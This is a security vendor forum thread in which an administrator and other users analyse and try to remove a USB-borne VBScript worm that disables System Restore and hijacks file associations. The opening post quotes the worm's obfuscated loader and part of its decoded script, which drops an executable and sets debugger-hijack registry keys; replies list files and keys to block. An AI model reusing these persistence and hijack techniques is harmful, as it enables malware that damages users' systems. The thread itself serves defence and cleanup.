Endpoint Protection

Startup

I'm a network administrator/technician/whatever other hats for an engineering firm. In working on a machine, I ended up getting an infection on a flash drive that got transferred onto my local workstation. The files above are part of the problem. The security threat also changes .vbs files to appear as MP3 audio files, and makes a plethora of registry changes. I have stopped most of what it's doing and countered it manually, but I'm still having issues. System Restore is still unavailable, and on reboot I have to wipe out a bunch of registry changes it's still making. I've been through SysInternals's startup choser, msconfig, and the Startup Control Panel 2.8 by Mike Lin. None have anything remotely suspicious turned on, and yet...

Strangely, on boot, I see the same problem. System restore is disabled completely regardless of it's two registry entries or changing it in gpedic, file associations are messed with, my C drive gets an Autorun/Autoplay that runs wscript.exe /e:vbs C:\(o_o).jpg.

(o_o).jpg

memuuu="big long string of jibberish": For i = 1 To Len(memuuu) : rhoooo = rhoooo&Chr(Asc(Mid(memuuu,i,4))-4):Next:Execute(rhoooo)

Not exactly the work of a genius, broke his VBS code in the first hour of messing with it. Since, however, I've been stuck in a quagmire of trying to figure out the source of a list of Windows issues. I wonder if the fools writing this stuff have a forum of annoying windows settings to play with once you start executing code on a remote system?

Processed (o_o).jpg

This code generates a long piece of VBS code with registry changes and an .exe built into it (I modified the script to kick it out to me and saved it into a txt, which gave me about half of the changes he was doing/files he was generating), and then propegating out.

''''BIG "BINARY" THING HERE'''''
bByte = hextoByte(shex)
Set ObjTextStream = fs.Createtextfile(winpath&"\system32\winxp.exe",True)
ObjTextStream.write bByte
ObjTextStream.close

resultat = reg.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon\")
reg.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installedows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwinxp.exe\Debugger",winpath&"\system32\winxp.exe" ,"REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\winjpg.jpg" ,"REG_SZ"

Function hextoByte(sData)
For lCounter = 1 To Len(sData) Step 2
hextoByte = hextoByte & Chr("&h" & Mid(sData, lCounter, 2))
Next
End Function

SEP's actions

From the beginning, SEP has done almost nothing to address this threat.

If I used a command prompt to:
type c:\(o_o).jpg >> c:\mytemp.txt

the file would -instantly- be deleted and Symantec Endpoint Protection 11 would throw a dialog telling me it blocked the threat. What's funny is it never once addressed the actual "(o_o).jpg" file. I had to fight it for a while to get it gone, but eventually I proved the better man and after two reboots, still no return. None of the obviously very sketchy registry edits caused any problems, turning off system restore never caused a prompt, it flawlessly created the %winddir%\system32\winxp.exe and pushed it into various registry entries.

In Closing

I really need to get rid of the rest of this. Considering what we pay for all our licenses of Symantec, it seems like me spending all this time on what's mostly a relatively simple threat is... nonsensical. I need to wipe out the rest of the threat, get System Restore working, and get it to stop messing with Windows Update.

I'm running Symantec Endpoint 11, definition file version 110729bd.

Any help would be appreciated. I can provide an unmodified version of the file in question, but bewarned they've created a nightmare for me, so if you ask for them, I take no responsibility :)

No need to send us these files..you can directly send it to the people who create the definitions for these virus.

Submit the files and in the next definitions (once it is checked)  it will get detected and deleted

https://submit.symantec.com/gold /basic /essential

depending on your support contract

Hi,

in addition, I understood that the virus came with a flash drive, likely due to the autoplay, I suggest you to disable it in all of your machines to prevent similar situations:
http://support.microsoft.com/kb/967715
This is an important security best practice regardless the AV product you are using.

Regards,

I had actually searched for that and a big part of my frustration has been not finding it. Many thanks! 

Thanks!

I know this is a fairly simple question, but you have gotten rid of the Temp files and such on this machine, haven't you? CCleaner does just that quite efficiently. And that's where I've found numerous infections propogating from, is the temp folders.
Just my two cents worth.

if you are not able to find the file...open the autorun.inf on your flash drive you see the name of the actual executable.. 

I had the same virus spreading in a quite large number of machines, where SEP was deleting the win.exe file but it keeps shpwing up in the risks log :)

I've spent a fair time analyzing this anf here is what I came up with
Here is what happens:
SEP identifies this risk as a Backdoor.Trojan, and deletes win.exe/winxp.exe file fron sytem32 folder as an action. The problem is that this isn't enough :) there are still other files, and registery keys that are creating the file again and agian.

I won't go in deep with the details of how it works, but there is still no definition for it. So here is the solution I've done, which has been pretty good in blocking this threat:
- Created an Application control policy rule which does the following:
blocks wscript.exe process from being called, besides from legitimate known processes.
Terminates wscript.exe process if it triws to read/write any if those files or registrey keys

blocks read/write attemtps of the following files:
system32/winxp.jpg - win.exe - wscript.exe - winfile.jpg

blocks read/write attempts of the following registrey keys:
HKLM\software\microsoft\windows\currentversion\run\CFTMON
HKLM\software\microsoft\windows\currentversion\run\riigdt

and any registrey entry including a vaule of :
winxp.jpg - win.exe - wscript.exe - winfile.jpg


Once thoe policy have been appied, I've deployed a batch file that cleans all previosuly infected machines, doing the following:
- Kills running wscript.exe processes
- Deletes the created files winxp.jpg - win.exe - wscript.exe - winfile.jpg
- Deletes the mentioned registrey entries, as well as other ones under "windowsNT\currentversion\image file execution" which was pointing some applications to execute win.exe instead of the targeted application
- Deletes a key named shell which is created under mountpoints, and points to win.exe/winfile.jpg to execute whenever you try access the drive


I know its wasn't that much work, but it had remediated the infection, and prevented it from occuring back :) but still there isn't a signature for it, although I've uploaded it for analysis quite a few weeks ago

Thanks for the response. Unfortunately, the autorun did the wscript.exe /e:vbs c:\winjpg.jpg, which was taken care of. I also found other files it referenced. They've all be exnayed, but the problem on bootup persists. I'm going to try to find a registry changes monitor service I can set to start up first on the machine and see if I can find out what process is setting the registry settings, and what all the settings are it's messing with.

Mine must be a different version of the same thing, as it's doing quite a bit more tahn just that, and some of the file names are mildly different. Sounds super familiar, though. I'm going to have to do some research on what you're talking about, as it could help quite a bit. 

I wish it'd get added to definitions -- I'm guessing seperate definitions for each file it creates, but still.

Might be another version, because I've seen different cases as win.exe appears to be created in some machines, where in the other hand winxp.exe is there on other machines. But it they almost the same methods, and the solution wokred perfect on both.

If you don't mind would you please provide me some more details about the different files and behaviour of the version your dealing with, so we can both work on it.

Have you search the entry from the registry editor?try to check if the entry still exist then delete it ? or check the task manager if the wscript is running then end the task of this process then got to run type msconfig then start up tab then disable all the start up, after this reboot your computer. check if the file still occur?

I've been cleaning up computers for years, and doing some software development, system administration, etc. So I have a pretty well-rounded skillset for dealing with this kind of stuff.  I think I outlined most of what I've done in my first post, actually. There's still something hiding, making changes on startup. 

I finally got enough of the files wiped out that it stopped recreating them, so I can't really get a lot of further details on the files created, but they were C:\(o_o).jpg, C:\windows\system32\winjpg.jpg, C:\windows\system32\winxp.exe. At first it seemed like they weren't hidden/read only, but as Symantec and I wailed on it, and it kept recreating them, that seemed to change.

It definitely has something watching for changes, and when I make certain changes in the registry or when I changed my view preferences to show hidden files, it reset them back instantly, before I could possibly make any other changes. I had to use a script to change file attributes and delete them. I'd love to figure out what. I may mess with some more of the SysInternals toolsagain  and see if I can sift through registry change logs to some useful resolution.

Full scans of SEP show nothing at all, for the startup problem, the registry change blocker. I think there's another symptom but I tried hard enough to forget the issue over the weekend, I think I succeeded :)

Some startup registry entry may be..or have you tried disconnecting your system from the network and internet then rebooting it..check if it comes back again..There might be some IE pluggins or Temp internet files aswell doing this.. 

Just a quick note to the forum- the definitions currently available for SEP and SAV should be effective against a threat that matches the symptoms described in this thread. 

If any matching current infection is encountered that is not successfully cleaned by the latest defs, please do submit samples of the files involved to Security Response!

Thanks and Besr Regards,

Mick

This is a question for anyone that can help. The o_o.jpg virus infected the computers we use at our University reactor, unfortunately the students use the same computers to do reports and homework for classes usually transferring files to and from the computers with their flash drives. As usual with a virus like this, not only are the operator office computers infected several of the student's personal computers are as well.  I've read over and over that you cannot access system restore to shut it down long enough to perform a scan. My question, now knowing how to erase the file from a flash drive, is there anyway to completely erase it from the computers that have been infected? So far, the only answers I've heard are "reformat...", "re-image and reformat"... and one guy said to "nuke the hard drive and start over" (I think that was supposed to be a nuclear pun...). Is there anyway to get rid of this thing so that I don't have to reformat all of these computers?

Hi have you scanned with any thrid party software like Trend Micro house call to see if that cleans up the mess?